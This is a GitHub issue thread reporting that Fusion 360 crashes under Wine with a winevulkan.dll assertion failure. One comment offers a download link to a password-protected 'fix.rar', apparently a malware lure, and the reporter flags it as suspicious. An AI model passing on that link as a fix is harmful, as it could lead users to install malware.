### ISSUE TITLE
winevulkan.dll - Assertion failed

### ISSUE THREAD

**Issue by Tony763** [cryinkfly/Autodesk-Fusion-360-for-Linux#474]
**Describe the bug**
With new clean installation from latest master, starting Fusion no longer works.

**To Reproduce**
Do clean installation by latest installer version
Wait for installation to finish
Automatic starting Fusion will crash

**Expected behavior**
Sing in screen

**Screenshots**
![image](https://github.com/user-attachments/assets/ba996b63-e063-485f-9614-eccabddc35ec)

**Desktop (please complete the following information):**
- Intel open-source Mesa driver 24.2.0 + NVIDIA 560.35.3
- Ubuntu 24.04
- Gnome
- Wine 9.16 and Wine-tkg 9.15

**Additional context**

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Tony763** [comment]
Suspicious reply :sweat_smile: : 

![image](https://github.com/user-attachments/assets/e6ae396a-2c6e-442d-a872-e285cab90723)

**Comment by Tony763** [comment]
O.o how is it completed? :thinking:
